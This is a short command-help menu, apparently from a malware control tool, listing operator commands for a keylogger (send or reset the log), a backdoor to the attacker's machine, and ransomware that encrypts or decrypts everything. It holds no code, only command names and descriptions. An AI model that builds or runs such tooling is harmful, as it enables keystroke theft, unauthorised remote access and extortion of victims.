###########################################################################################################################
####################################################     KEYLOGGER     ####################################################
###########################################################################################################################

[+] keylogger send_log: Sends the log and resets it
[+] keylogger reset_log: Erases all the content of the log file

###########################################################################################################################
####################################################     BACKDOOR     #####################################################
###########################################################################################################################

[+] backdoor start: Opens a backdoor with the attacker's machine
[+] backdoor stop: Closes the backdoor with the attacker's machine

###########################################################################################################################
###################################################     RANSOMWARE     ####################################################
###########################################################################################################################

[+] ransomware encrypt: Let the ransomware encrypt everything
[+] ransomware decrypt: Let the ransomware decrypt everything